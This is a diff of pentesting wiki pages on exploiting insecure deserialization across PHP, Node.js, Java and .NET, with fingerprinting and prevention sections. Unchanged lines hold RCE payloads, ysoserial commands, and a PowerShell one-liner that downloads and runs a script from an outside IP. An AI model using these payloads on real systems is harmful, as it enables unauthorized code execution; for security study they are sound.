-**You should read: **[**https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html)** for learn how to attack.**
+**You should read:** [**https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html) **for learn how to attack.**
 
 ## PHP
 
@@ -98,11 +98,11 @@ $ser=serialize($o);
 
 ****[**PHPGCC**](https://github.com/ambionics/phpggc) can help you generating payloads to abuse PHP deserializations.\
 Note than in several cases you **won't be able to find a way to abuse a deserialization in the source code** of the application but you may be able to **abuse the code of external PHP extensions.**\
-****So, if you can, check the `phpinfo()` of the server and **search on the internet **(an even on the **gadgets** of **PHPGCC**) some possible gadget you could abuse.
+****So, if you can, check the `phpinfo()` of the server and **search on the internet** (an even on the **gadgets** of **PHPGCC**) some possible gadget you could abuse.
 
 ### phar:// metadata deserialization
 
-If you have found a LFI that is just reading the file and not executing the php code inside of it, for example using functions like_** file\_get\_contents(), fopen(), file() or file\_exists(), md5\_file(), filemtime() or filesize()**_**. **You can try to abuse a **deserialization** occurring when **reading** a **file** using the **phar** protocol.\
+If you have found a LFI that is just reading the file and not executing the php code inside of it, for example using functions like _**file\_get\_contents(), fopen(), file() or file\_exists(), md5\_file(), filemtime() or filesize()**_**.** You can try to abuse a **deserialization** occurring when **reading** a **file** using the **phar** protocol.\
 For more information read the following post:
 
 {% content-ref url="../file-inclusion/phar-deserialization.md" %}
@@ -130,7 +130,7 @@ For more information about escaping from **pickle jails** check:
 [bypass-python-sandboxes](../../misc/basic-python/bypass-python-sandboxes/)
 {% endcontent-ref %}
 
-### Yaml** & **jsonpickle
+### Yaml **&** jsonpickle
 
 The following page present the technique to **abuse an unsafe deserialization in yamls** python libraries and finishes with a tool that can be used to generate RCE deserialization payload for **Pickle, PyYAML, jsonpickle and ruamel.yaml**:
 
@@ -175,9 +175,9 @@ Inside the file `node-serialize/lib/serialize.js` you can find the same flag and
 
 ![](<../../.gitbook/assets/image (298).png>)
 
-As you may see in the last chunk of code,** if the flag is found** `eval` is used to deserialize the function, so basically** user input if being used inside the `eval` function**.
+As you may see in the last chunk of code, **if the flag is found** `eval` is used to deserialize the function, so basically **user input if being used inside the `eval` function**.
 
-However, **just serialising **a function **won't execute it **as it would be necessary that some part of the code is **calling `y.rce`** in our example and that's highly **unlikable**.\
+However, **just serialising** a function **won't execute it** as it would be necessary that some part of the code is **calling `y.rce`** in our example and that's highly **unlikable**.\
 Anyway, you could just **modify the serialised object** **adding some parenthesis** in order to auto execute the serialized function when the object is deserialized.\
 In the next chunk of code **notice the last parenthesis** and how the `unserialize` function will automatically execute the code:
 
@@ -187,7 +187,7 @@ var test = {"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /'
 serialize.unserialize(test);
 ```
 
-As it was previously indicated, this library will get the code after`_$$ND_FUNC$$_` and will** execute it** using `eval`. Therefore, in order to **auto-execute code** you can** delete the function creation** part and the last parenthesis and **just execute a JS oneliner** like in the following example:
+As it was previously indicated, this library will get the code after`_$$ND_FUNC$$_` and will **execute it** using `eval`. Therefore, in order to **auto-execute code** you can **delete the function creation** part and the last parenthesis and **just execute a JS oneliner** like in the following example:
 
 ```javascript
 var serialize = require('node-serialize');
@@ -195,13 +195,13 @@ var test = '{"rce":"_$$ND_FUNC$$_require(\'child_process\').exec(\'ls /\', funct
 serialize.unserialize(test);
 ```
 
-You can** **[**find here**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/)** further information** about how to exploit this vulnerability.
+You can **** [**find here**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) **further information** about how to exploit this vulnerability.
 
 ### [funcster](https://www.npmjs.com/package/funcster)
 
 The interesting difference here is that the **standard built-in objects are not accessible**, because they are out of scope. It means that we can execute our code, but cannot call build-in objects’ methods. So if we use `console.log()` or `require(something)`, Node returns an exception like `"ReferenceError: console is not defined"`.
 
-However, we can easily can get back access to everything because we still have access to the global context using something like ` this.constructor.constructor("console.log(1111)")();`:
+However, we can easily can get back access to everything because we still have access to the global context using something like `this.constructor.constructor("console.log(1111)")();`:
 
 ```javascript
 funcster = require("funcster");
@@ -218,7 +218,7 @@ var desertest3 = { __js_function: 'this.constructor.constructor("require(\'child
 funcster.deepDeserialize(desertest3)
 ```
 
-**For**[** more information read this page**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.**
+**For**[ **more information read this page**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.**
 
 ### ****[**serialize-javascript**](https://www.npmjs.com/package/serialize-javascript)****
 
@@ -252,13 +252,13 @@ In the following pages you can find information about how to abuse this library
 
 ## Java - HTTP
 
-The main problem with deserialized objects in Java is that **deserialization callbacks were invoked during deserialization**. This makes possible for an **attacker **to** take advantage of that callbacks** and prepare a payload that abuses the callbacks to **perform malicious actions**.
+The main problem with deserialized objects in Java is that **deserialization callbacks were invoked during deserialization**. This makes possible for an **attacker** to **take advantage of that callbacks** and prepare a payload that abuses the callbacks to **perform malicious actions**.
 
 ### Fingerprints
 
 #### White Box
 
-Search inside the code for serialization classes and function. For example, search for classes implementing `Serializable` , the use of `java.io.ObjectInputStream`_ _or `readObject`_ _or `readUnshare` functions_._
+Search inside the code for serialization classes and function. For example, search for classes implementing `Serializable` , the use of `java.io.ObjectInputStream` __ or `readObject` __ or `readUnshare` functions_._
 
 You should also keep an eye on:
 
@@ -271,7 +271,7 @@ You should also keep an eye on:
 
 #### Black Box
 
-**Fingerprints/Magic Bytes** of **java serialised **objects (from `ObjectInputStream`):
+**Fingerprints/Magic Bytes** of **java serialised** objects (from `ObjectInputStream`):
 
 * `AC ED 00 05` in Hex
 * `rO0` in Base64
@@ -286,7 +286,7 @@ javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAA
 
 ### Check if vulnerable
 
-If you want to** learn about how does a Java Deserialized exploit work** you should take a look to [**Basic Java Deserialization**](basic-java-deserialization-objectinputstream-readobject.md), [**Java DNS Deserialization**](java-dns-deserialization-and-gadgetprobe.md), and [**CommonsCollection1 Payload**](java-transformers-to-rutime-exec-payload.md).
+If you want to **learn about how does a Java Deserialized exploit work** you should take a look to [**Basic Java Deserialization**](basic-java-deserialization-objectinputstream-readobject.md), [**Java DNS Deserialization**](java-dns-deserialization-and-gadgetprobe.md), and [**CommonsCollection1 Payload**](java-transformers-to-rutime-exec-payload.md).
 
 #### White Box Test
 
@@ -297,35 +297,35 @@ find . -iname "*commons*collection*"
 grep -R InvokeTransformer .
 ```
 
-You could try to** check all the libraries** known to be vulnerable and that** **[**Ysoserial** ](https://github.com/frohoff/ysoserial)can provide an exploit for. Or you could check the libraries indicated on [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json).\
-You could also use** **[**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector) to search for possible gadget chains that can be exploited.\
+You could try to **check all the libraries** known to be vulnerable and that **** [**Ysoserial** ](https://github.com/frohoff/ysoserial)can provide an exploit for. Or you could check the libraries indicated on [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json).\
+You could also use **** [**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector) to search for possible gadget chains that can be exploited.\
 When running **gadgetinspector** (after building it) don't care about the tons of warnings/errors that it's going through and let it finish. It will write all the findings under _gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt_. Please, notice that **gadgetinspector won't create an exploit and it may indicate false positives**.
 
 #### Black Box Test
 
-Using the Burp extension [**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md) you can identify** which libraries are available **(and even the versions). With this information it could be **easier to choose a payload** to exploit the vulnerability.\
-[**Read this to learn more about GadgetProbe**](java-dns-deserialization-and-gadgetprobe.md#gadgetprobe)**. **\
-****GadgetProbe is focused on** `ObjectInputStream` **deserializations**.**
+Using the Burp extension [**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md) you can identify **which libraries are available** (and even the versions). With this information it could be **easier to choose a payload** to exploit the vulnerability.\
+[**Read this to learn more about GadgetProbe**](java-dns-deserialization-and-gadgetprobe.md#gadgetprobe)**.** \
+****GadgetProbe is focused on ** `ObjectInputStream` ** deserializations**.**
 
-Using Burp extension [**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) you can **identify vulnerable libraries **exploitable with ysoserial and **exploit **them.\
-[**Read this to learn more about Java Deserialization Scanner.**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner)** **\
+Using Burp extension [**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) you can **identify vulnerable libraries** exploitable with ysoserial and **exploit** them.\
+[**Read this to learn more about Java Deserialization Scanner.**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) **** \
 ****Java Deserialization Scanner is focused on **`ObjectInputStream`** deserializations.
 
-You can also use [**Freddy**](https://github.com/nccgroup/freddy) to **detect deserializations** vulnerabilities in **Burp**. This plugin will detect **not only `ObjectInputStream`**related vulnerabilities but **also **vulns from **Json **an **Yml **deserialization libraries. In active mode, it will try to confirm them using sleep or DNS payloads.\
+You can also use [**Freddy**](https://github.com/nccgroup/freddy) to **detect deserializations** vulnerabilities in **Burp**. This plugin will detect **not only `ObjectInputStream`**related vulnerabilities but **also** vulns from **Json** an **Yml** deserialization libraries. In active mode, it will try to confirm them using sleep or DNS payloads.\
 [**You can find more information about Freddy here.**](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/)****
 
 **Serialization Test**
 
 Not all is about checking if any vulnerable library is used by the server. Sometimes you could be able to **change the data inside the serialized object and bypass some checks** (maybe grant you admin privileges inside a webapp).\
-If you find a java serialized object being sent to a web application, **you can use **[**SerializationDumper**](https://github.com/NickstaDB/SerializationDumper)** to print in a more human readable format the serialization object that is sent**. Knowing which data are you sending would be easier to modify it and bypass some checks.
+If you find a java serialized object being sent to a web application, **you can use** [**SerializationDumper**](https://github.com/NickstaDB/SerializationDumper) **to print in a more human readable format the serialization object that is sent**. Knowing which data are you sending would be easier to modify it and bypass some checks.
 
 ### **Exploit**
 
 #### **ysoserial**
 
-The most well-known tool to exploit HTTP deserializations is** **[**ysoserial**](https://github.com/frohoff/ysoserial) ([**download here**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)).\
-****Note that this tool is **focused **on exploiting **`ObjectInputStream`**.\
-I would **start using the "URLDNS"** payload **before a RCE **payload to test if the injection is possible. Anyway, note that maybe the "URLDNS" payload is not working but other RCE payload is.
+The most well-known tool to exploit HTTP deserializations is **** [**ysoserial**](https://github.com/frohoff/ysoserial) ([**download here**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)).\
+****Note that this tool is **focused** on exploiting **`ObjectInputStream`**.\
+I would **start using the "URLDNS"** payload **before a RCE** payload to test if the injection is possible. Anyway, note that maybe the "URLDNS" payload is not working but other RCE payload is.
 
 ```bash
 # PoC to make the application perform a DNS req
@@ -372,7 +372,7 @@ java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,ZXhwb
 base64 -w0 payload
 ```
 
-When creating a payload for** java.lang.Runtime.exec()** you **cannot use special characters **like ">" or "|" to redirect the output of an execution, "$()" to execute commands or even **pass arguments **to a command separated by **spaces **(you can do `echo -n "hello world"` but you can't do `python2 -c 'print "Hello world"'`). In order to encode correctly the payload you could [use this webpage](http://www.jackson-t.ca/runtime-exec-payloads.html).
+When creating a payload for **java.lang.Runtime.exec()** you **cannot use special characters** like ">" or "|" to redirect the output of an execution, "$()" to execute commands or even **pass arguments** to a command separated by **spaces** (you can do `echo -n "hello world"` but you can't do `python2 -c 'print "Hello world"'`). In order to encode correctly the payload you could [use this webpage](http://www.jackson-t.ca/runtime-exec-payloads.html).
 
 Feel free to use the next script to create **all the possible code execution** payloads for Windows and Linux and then test them on the vulnerable web page:
 
@@ -399,12 +399,12 @@ generate('Linux', 'ping -c 1 nix.REPLACE.server.local')
 
 #### serialkillerbypassgadgets
 
-You can **use **[**https://github.com/pwntester/SerialKillerBypassGadgetCollection**](https://github.com/pwntester/SerialKillerBypassGadgetCollection)** along with ysoserial to create more exploits**. More information about this tool in the **slides of the talk** where the tool was presented: [https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next\_slideshow=1](https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next\_slideshow=1)
+You can **use** [**https://github.com/pwntester/SerialKillerBypassGadgetCollection**](https://github.com/pwntester/SerialKillerBypassGadgetCollection) **along with ysoserial to create more exploits**. More information about this tool in the **slides of the talk** where the tool was presented: [https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next\_slideshow=1](https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next\_slideshow=1)
 
 #### marshalsec
 
-****[**marshalsec** ](https://github.com/mbechler/marshalsec)can be used to generate payloads to exploit different **Json **and **Yml **serialization libraries in Java.\
-In order to compile the project I needed to **add **this **dependencies **to `pom.xml`:
+****[**marshalsec** ](https://github.com/mbechler/marshalsec)can be used to generate payloads to exploit different **Json** and **Yml** serialization libraries in Java.\
+In order to compile the project I needed to **add** this **dependencies** to `pom.xml`:
 
 ```markup
 <dependency>
@@ -421,7 +421,7 @@ In order to compile the project I needed to **add **this **dependencies **to `po
 </dependency>
 ```
 
-**Install maven**, and **compile **the project:
+**Install maven**, and **compile** the project:
 
 ```bash
 sudo apt-get install maven
@@ -442,9 +442,9 @@ Read more about this Java JSON library: [https://www.alphabot.com/security/blog/
 Java LOVES sending serialized objects all over the place. For example:
 
 * In **HTTP requests** – Parameters, ViewState, Cookies, you name it.
-* **RMI **– The extensively used Java RMI protocol is 100% based on serialization
-* **RMI over HTTP **– Many Java thick client web apps use this – again 100% serialized objects
-* **JMX **– Again, relies on serialized objects being shot over the wire
+* **RMI** – The extensively used Java RMI protocol is 100% based on serialization
+* **RMI over HTTP** – Many Java thick client web apps use this – again 100% serialized objects
+* **JMX** – Again, relies on serialized objects being shot over the wire
 * **Custom Protocols** – Sending an receiving raw Java objects is the norm – which we’ll see in some of the exploits to come
 
 ### Prevention
@@ -526,7 +526,7 @@ Example:  [rO0 by Contrast Security](https://github.com/Contrast-Security-OSS/co
 * [https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr](https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr)
 * [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
 * [https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html](https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html)
-* Java and .Net JSON deserialization** paper: **[**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** talk: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) and slides: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
+* Java and .Net JSON deserialization **paper:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** talk: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) and slides: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
 * Deserialziations CVEs: [https://paper.seebug.org/123/](https://paper.seebug.org/123/)
 
 ## JMS - Java Message Service
@@ -548,7 +548,7 @@ This means that in this exploitation all the **clients that are going to use tha
 
 You should remember that even if a service is vulnerable (because it's insecurely deserializing user input) you still need to find valid gadgets to exploit the vulnerability.&#x20;
 
-The tool [JMET](https://github.com/matthiaskaiser/jmet) was created to** connect and attack this services sending several malicious objects serialized using known gadgets**. These exploits will work if the service is still vulnerable and if any of the used gadgets is inside the vulnerable application.
+The tool [JMET](https://github.com/matthiaskaiser/jmet) was created to **connect and attack this services sending several malicious objects serialized using known gadgets**. These exploits will work if the service is still vulnerable and if any of the used gadgets is inside the vulnerable application.
 
 ### References
 
@@ -557,7 +557,7 @@ The tool [JMET](https://github.com/matthiaskaiser/jmet) was created to** connect
 
 ## .Net
 
-.Net is similar to Java regarding how deserialization exploits work: The **exploit **will **abuse gadgets **that **execute **some interesting **code when **an object is **deserialized**.
+.Net is similar to Java regarding how deserialization exploits work: The **exploit** will **abuse gadgets** that **execute** some interesting **code when** an object is **deserialized**.
 
 ### Fingerprint
 
@@ -572,28 +572,28 @@ Look for any serializers where the type is set by a user controlled variable.
 
 #### BlackBox
 
-You can search for the Base64 encoded string **AAEAAAD///// **or any other thing that **may be deserialized** in the back-end and that allows you to control the deserialized type**. **For example, a **JSON **or **XML **containing `TypeObject` or `$type`.
+You can search for the Base64 encoded string **AAEAAAD/////** or any other thing that **may be deserialized** in the back-end and that allows you to control the deserialized type**.** For example, a **JSON** or **XML** containing `TypeObject` or `$type`.
 
 ### ysoserial.net
 
-In this case you can use the tool [**ysoserial.net**](https://github.com/pwntester/ysoserial.net) in order to** create the deserialization exploits**. Once downloaded the git repository you should **compile the tool** using Visual Studio for example.
+In this case you can use the tool [**ysoserial.net**](https://github.com/pwntester/ysoserial.net) in order to **create the deserialization exploits**. Once downloaded the git repository you should **compile the tool** using Visual Studio for example.
 
-If you want to learn about **how does ysoserial.net creates it's exploit **you can [**check this page where is explained the ObjectDataProvider gadget + ExpandedWrapper + Json.Net formatter**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md).
+If you want to learn about **how does ysoserial.net creates it's exploit** you can [**check this page where is explained the ObjectDataProvider gadget + ExpandedWrapper + Json.Net formatter**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md).
 
-The main options of **ysoserial.net** are: **`--gadget`**, **`--formatter`**, **`--output` **and **`--plugin`.**
+The main options of **ysoserial.net** are: **`--gadget`**, **`--formatter`**, **`--output` ** and **`--plugin`.**
 
 * **`--gadget`** used to indicate the gadget to abuse (indicate the class/function that will be abused during deserialization to execute commands).
 * &#x20;**`--formatter`**, used to indicated the method to serialized the exploit (you need to know which library is using the back-end to deserialize the payload and use the same to serialize it)
-* &#x20;**`--output` **used to indicate if you want the exploit in **raw **or **base64 **encoded. _Note that **ysoserial.net** will **encode **the payload using** UTF-16LE** (encoding used by default on Windows) so if you get the raw and just encode it from a linux console you might have some **encoding compatibility problems **that will prevent the exploit from working properly (in HTB JSON box the payload worked in both UTF-16LE and ASCII but this doesn't mean it will always work)._
-* **`--plugin` **ysoserial.net supports plugins to craft **exploits for specific frameworks** like ViewState
+* &#x20;**`--output` ** used to indicate if you want the exploit in **raw** or **base64** encoded. _Note that **ysoserial.net** will **encode** the payload using **UTF-16LE** (encoding used by default on Windows) so if you get the raw and just encode it from a linux console you might have some **encoding compatibility problems** that will prevent the exploit from working properly (in HTB JSON box the payload worked in both UTF-16LE and ASCII but this doesn't mean it will always work)._
+* **`--plugin` ** ysoserial.net supports plugins to craft **exploits for specific frameworks** like ViewState
 
 #### More ysoserial.net parameters
 
-* `--minify` will provide a** smaller payload** (if possible)
+* `--minify` will provide a **smaller payload** (if possible)
 * `--raf -f Json.Net -c "anything"` This will indicate all the gadgets that can be used with a provided formatter (`Json.Net` in this case)
-* `--sf xml` you can** indicate a gadget** (`-g`)and ysoserial.net will search for formatters containing "xml" (case insensitive)
+* `--sf xml` you can **indicate a gadget** (`-g`)and ysoserial.net will search for formatters containing "xml" (case insensitive)
 
-**ysoserial examples **to create exploits:
+**ysoserial examples** to create exploits:
 
 ```bash
 #Send ping
@@ -613,8 +613,8 @@ echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.44/shell.
 ysoserial.exe -g ObjectDataProvider -f Json.Net -c "powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADQANAAvAHMAaABlAGwAbAAuAHAAcwAxACcAKQA=" -o base64
 ```
 
-**ysoserial.net** has also a** very interesting parameter** that helps to understand better how every exploit works: `--test`\
-If you indicates this parameter **ysoserial.net** will **try **the **exploit locally, **so you can test if your payload will work correctly.\
+**ysoserial.net** has also a **very interesting parameter** that helps to understand better how every exploit works: `--test`\
+If you indicates this parameter **ysoserial.net** will **try** the **exploit locally,** so you can test if your payload will work correctly.\
 This parameter is helpful because if you review the code you will find chucks of code like the following one (from [ObjectDataProviderGenerator.cs](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Generators/ObjectDataProviderGenerator.cs#L208)):
 
 ```java
@@ -645,11 +645,11 @@ public static object JsonNet_deserialize(string str)
 ```
 
 In the **previous code is vulnerable to the exploit created**. So if you find something similar in a .Net application it means that probably that application is vulnerable too.\
-Therefore the **`--test`** parameter allows us to understand** which chunks of code are vulnerable** to the desrialization exploit that **ysoserial.net** can create.
+Therefore the **`--test`** parameter allows us to understand **which chunks of code are vulnerable** to the desrialization exploit that **ysoserial.net** can create.
 
 ### ViewState
 
-Take a look to [this POST about **how to try to exploit the \_\_ViewState parameter of .Net **](exploiting-\_\_viewstate-parameter.md)to **execute arbitrary code. **If you** already know the secrets **used by the victim machine,** **[**read this post to know to execute code**](exploiting-\_\_viewstate-knowing-the-secret.md)**.**
+Take a look to [this POST about **how to try to exploit the \_\_ViewState parameter of .Net** ](exploiting-\_\_viewstate-parameter.md)to **execute arbitrary code.** If you **already know the secrets** used by the victim machine, **** [**read this post to know to execute code**](exploiting-\_\_viewstate-knowing-the-secret.md)**.**
 
 ### **Prevention**
 
@@ -704,14 +704,14 @@ Try to keep any code that might create potential gadgets separate from any code
 
 ### **References**
 
-* Java and .Net JSON deserialization** paper: **[**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** talk: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) and slides: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
+* Java and .Net JSON deserialization **paper:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** talk: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) and slides: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
 * [https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html#net-csharp](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html#net-csharp)
 * [https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH\_US\_12\_Forshaw\_Are\_You\_My\_Type\_WP.pdf](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH\_US\_12\_Forshaw\_Are\_You\_My\_Type\_WP.pdf)
 * [https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization](https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization)
 
 ## **Ruby**
 
-Ruby has two methods to implement serialization inside the **marshal **library: first method is **dump** that converts object into bytes streams **(serialize)**. And the second method is **load **to convert bytes stream to object again (**deserialize**).\
+Ruby has two methods to implement serialization inside the **marshal** library: first method is **dump** that converts object into bytes streams **(serialize)**. And the second method is **load** to convert bytes stream to object again (**deserialize**).\
 Ruby uses HMAC to sign the serialized object and saves the key on one of the following files:
 
 * config/environment.rb
diff --git a/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
index f780cc47..66edd615 100644
--- a/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
+++ b/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
@@ -1,22 +1,22 @@
 # Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)
 
-This post is dedicated to **understand how the gadget ObjectDataProvider is exploited **to obtain RCE and **how **the Serialization libraries **Json.Net and xmlSerializer can be abused** with that gadget.
+This post is dedicated to **understand how the gadget ObjectDataProvider is exploited** to obtain RCE and **how** the Serialization libraries **Json.Net and xmlSerializer can be abused** with that gadget.
 
 ## ObjectDataProvider Gadget
 
 From the documentation: _the ObjectDataProvider Class Wraps and creates an object that you can use as a binding source_.\
-Yeah, it's a weird explanation, so lets see what does this class have that is so interesting:  This class allows to **wrap an arbitrary object**, use _**MethodParameters **_to **set arbitrary parameters,** and then **use MethodName to call an arbitrary function** of the arbitrary object declared using the arbitrary parameters.\
-Therefore, the arbitrary **object **will **execute **a **function **with **parameters while being deserialized.**
+Yeah, it's a weird explanation, so lets see what does this class have that is so interesting:  This class allows to **wrap an arbitrary object**, use _**MethodParameters**_ to **set arbitrary parameters,** and then **use MethodName to call an arbitrary function** of the arbitrary object declared using the arbitrary parameters.\
+Therefore, the arbitrary **object** will **execute** a **function** with **parameters while being deserialized.**
 
 ### **How is this possible**
 
-The ObjectDataProvider is defined and implemented in the System.Windows.Data namespace, which is located in the **PresentationFramework.dll **(_C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF_).
+The ObjectDataProvider is defined and implemented in the System.Windows.Data namespace, which is located in the **PresentationFramework.dll** (_C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF_).
 
 Using [**dnSpy**](https://github.com/0xd4d/dnSpy) you can **inspect the code** of the class we are interested in. In the image below we are seeing the code of **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name**
 
 ![](<../../.gitbook/assets/image (299).png>)
 
-As you can observe when `MethodName` is set` base.Refresh()` is called, lets take a look to what does it do:
+As you can observe when `MethodName` is set `base.Refresh()` is called, lets take a look to what does it do:
 
 ![](<../../.gitbook/assets/image (300).png>)
 
@@ -30,7 +30,7 @@ Note that at the end of the code it's calling `this.QueryWorke(null)`. Let's see
 
 Note that this isn't the complete code of the function `QueryWorker` but it shows the interesting part of it: The code **calls `this.InvokeMethodOnInstance(out ex);`** this is the line where the **method set is invoked**.
 
-If you want to check that just setting the _**MethodName **_**it will be executed**, you can run this code:
+If you want to check that just setting the _**MethodName**_** it will be executed**, you can run this code:
 
 ```java
 using System.Windows.Data;
@@ -52,14 +52,14 @@ namespace ODPCustomSerialExample
 }
 ```
 
-Note that you need to add as reference _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_** **in order to load `System.Windows.Data`
+Note that you need to add as reference _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ **** in order to load `System.Windows.Data`
 
 ## ExpandedWrapper
 
-Using the previous exploit there will be cases where the **object **is going to be **deserialized  as **an _**ObjectDataProvider **_**instance **(for example in DotNetNuke vuln, using XmlSerializer, the object was deserialized using `GetType`). Then, will have **no knowledge of the object type that is wrapped** in the _ObjectDataProvider_ instance (`Process` for example). You can find more [information about the DotNetNuke vuln here](https://translate.google.com/translate?hl=en\&sl=auto\&tl=en\&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F\&sandbox=1).
+Using the previous exploit there will be cases where the **object** is going to be **deserialized  as** an _**ObjectDataProvider**_** instance** (for example in DotNetNuke vuln, using XmlSerializer, the object was deserialized using `GetType`). Then, will have **no knowledge of the object type that is wrapped** in the _ObjectDataProvider_ instance (`Process` for example). You can find more [information about the DotNetNuke vuln here](https://translate.google.com/translate?hl=en\&sl=auto\&tl=en\&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F\&sandbox=1).
 
